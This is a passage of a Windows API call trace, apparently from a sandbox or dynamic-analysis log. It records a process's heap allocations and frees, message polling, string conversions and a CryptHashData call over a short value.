lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0257.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0257.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0257.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0257.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0257.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0257.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55058, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0257.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0257.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0257.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0257.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0257.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.259] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0257.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0257.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0257.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0257.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fa8 [0257.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0257.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0257.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0257.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0257.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0257.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0257.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0257.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0257.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0257.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0257.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0257.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0257.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0257.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0257.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0257.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55108 [0257.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0257.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0257.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0257.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0257.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0257.262] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0257.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0257.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51328 [0257.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51328, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0257.263] CryptHashData (hHash=0xa87510, pbData=0x2e54fa8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0257.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0257.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0257.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0257.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0257.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0257.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0257.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0257.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0257.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0257.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0257.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: 